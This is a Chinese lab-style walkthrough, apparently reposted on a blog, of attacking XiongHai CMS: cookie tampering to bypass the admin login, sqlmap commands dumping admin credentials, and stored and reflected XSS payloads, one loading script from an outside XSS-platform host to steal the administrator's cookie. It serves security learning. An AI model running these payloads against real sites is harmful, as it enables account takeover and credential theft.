熊海CMS网站SQL注入、XSS攻击、cookie篡改

这篇具有很好参考价值的文章主要介绍了熊海CMS网站SQL注入、XSS攻击、cookie篡改。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

CMS下载地址:https://www.jb51.net/codes/303119.html

代码审计,篡改cookie登录管理员界面

  1. 通过信息搜集找到了网站的源码

熊海CMS网站SQL注入、XSS攻击、cookie篡改

熊海CMS网站SQL注入、XSS攻击、cookie篡改

this.location='?r=index,发现登录后台的URL

  1. 查看源码中登录验证的代码

熊海CMS网站SQL注入、XSS攻击、cookie篡改

分析:如果cookie中use为空,还是跳回到登录界面,所以user不为空,则跳过验证,实现cookie的篡改

熊海CMS网站SQL注入、XSS攻击、cookie篡改

通过修改url地址,burp抓包修改cookie

熊海CMS网站SQL注入、XSS攻击、cookie篡改

熊海CMS网站SQL注入、XSS攻击、cookie篡改

成功登录到管理员的后台

一、SQL注入获取管理员账号密码

1. 点开一篇文章,存在get请求参数

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

2. 手工注入无果,使用sqlmap,后跟-p接指定参数,验证是否存在sql注入

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid"

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

3. 爆数据库

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" --dbs

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

4. 爆表

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms --tables

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

5. 爆字段

sqlmap.py -u "http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms -T manage --columns

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

6. 爆值

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms -T manage -C user,password --dump

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

熊海CMS网站SQL注入、XSS攻击、cookie篡改

7. MD5解密202cb962ac59075b964b07152d234b70  为  123

得到管理员的账号密码 admin /123

可以进一步登进后台操作


二、存储型XSS获取管理员cookie

1. 在xss平台上配置监听端口

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

2. 复制代码,<sCRiPt sRC=http://xss.fbisb.com/tHbs></sCrIpT>

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

3. 在表单中插入xss脚本

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

4. 发表成功,等待管理员登录后台查看留言,

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

5. 监听段得到服务端反弹过来的信息,得到管理员的cookie

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

6. 找到网站后台,登录抓包

 熊海CMS网站SQL注入、XSS攻击、cookie篡改

把cookie替换陈管理员的cookie,并且记得要换上面的目标网址把login.php换成index.php,需要改多个包,发包进入后台

 熊海CMS网站SQL注入、XSS攻击、cookie篡改


三、反弹型xss

http://192.168.31.68/?r=content&cid=5' <img src=1 οnerrοr=alert(/xss/)>

熊海CMS网站SQL注入、XSS攻击、cookie篡改

http://192.168.31.68/?r=list&class=3&page=1'<img src=1 οnerrοr=alert(/xss/)>

 熊海CMS网站SQL注入、XSS攻击、cookie篡改文章来源地址https://www.toymoban.com/news/detail-500736.html

到了这里,关于熊海CMS网站SQL注入、XSS攻击、cookie篡改的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网站代码sql注入攻击漏洞修复加固防护措施

    什么是SQL注入攻击? SQL注入是一种网站的攻击方法。它将SQL代码添加到网站前端GET POST参数中,并将其传递给mysql数据库进行分析和执行语句攻击。 如何生成SQL注入漏洞的? 1。网站程序员以及运维技术是不能保证所有的前端输入都被安全效验与拦截过滤。 2。攻击者使用发送

    2024年02月01日
    浏览(25)
  • 【Node.js实战】一文带你开发博客项目之安全(sql注入、xss攻击、md5加密算法)

    个人简介 👀 个人主页: 前端杂货铺 🙋‍♂️ 学习方向: 主攻前端方向,也会涉及到服务端 📃 个人状态: 在校大学生一枚,已拿多个前端 offer(秋招) 🚀 未来打算: 为中国的工业软件事业效力n年 🥇 推荐学习:🍍前端面试宝典 🍉Vue2 🍋Vue3 🍓Vue2Vue3项目实战 🥝

    2024年02月03日
    浏览(20)
  • SpringCloud微服务实战——搭建企业级开发框架:微服务安全加固—自定义Gateway拦截器实现防止SQL注入/XSS攻击

     SQL注入是常见的系统安全问题之一,用户通过特定方式向系统发送SQL脚本,可直接自定义操作系统数据库,如果系统没有对SQL注入进行拦截,那么用户甚至可以直接对数据库进行增删改查等操作。   XSS全称为Cross Site Script跨站点脚本攻击,和SQL注入类似,都是通过特定方

    2024年02月03日
    浏览(39)
  • XSS攻击(1), 测试XSS漏洞, 获取cookie

    一, 概念: XSS(Cross-Site Scripting), 跨站攻击脚本, XSS漏洞发生在前端, 依赖于浏览器的解析引擎, 让前端执行攻击代码. XSS其实也算注入类的攻击, XSS代码注入需要有JavaScript编程基础. 二, 目的: XSS(跨站脚本)攻击的目的多种多样,攻击者可以利用这种漏洞实施各种恶意行为。以下

    2024年02月07日
    浏览(27)
  • XSS注入(跨站脚本攻击)

    今天学习一下xss注入 XSS注入漏洞又称为\\\"跨站脚本攻击(Cross Site Scripting)\\\",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSS。xss本质上是黑客通过对网页的HTML注入,篡改了原本服务器发给客户端的数据包,在其中插入了恶意的Script代码插入到网页

    2024年02月09日
    浏览(19)
  • 熊海cms渗透测试

    首先,先进行代码审计,丢进seay源代码审计系统自动审计,然后接着一个个手动分析代码 1.文件包含 /index.php 和admin/index.php代码如下 分析代码,接收传进来的参数r,进行addslashes过滤( 在每个双引号(\\\")前添加反斜杠: ),然后进行判断,再进行文件包含,则这里是个文件

    2024年02月11日
    浏览(11)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(24)
  • 21Dak攻击:计算机顶会PLDI‘23 针对语义依附代码模型的对抗攻击方法:Destroyer篡改输入程序,Finder寻找关键特征,Merger关键特征注入【网安AIGC专题11.22】

    本文为邹德清教授的《网络安全专题》课堂笔记系列的文章,本次专题主题为大模型。 陈苏宁同学分享了Discrete Adversarial Attack to Models of Code《对代码模型的离散对抗性攻击》 PPT很清爽接受起来比较顺畅 论文发布在:PLDI 2023(Programming Language Design and Implementation)计算机科学领

    2024年01月16日
    浏览(24)
  • 友点CMS GetSpecial SQL注入漏洞复现

    友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人,都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板,方便用户按需调整。同时,它具备强大的SEO功能,能提升网站在搜索引擎

    2024年02月20日
    浏览(19)
  • 什么是SQL注入攻击,解释如何防范SQL注入攻击?

    SQL注入攻击是一种常见的网络攻击方式,攻击者通过在Web应用程序的查询语句中插入恶意代码,从而获取数据库中的敏感信息或者执行其他恶意操作。 为了防范SQL注入攻击,可以采取以下措施: 使用参数化查询:使用参数化查询可以避免攻击者通过查询语句中的参数注入恶

    2024年02月10日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包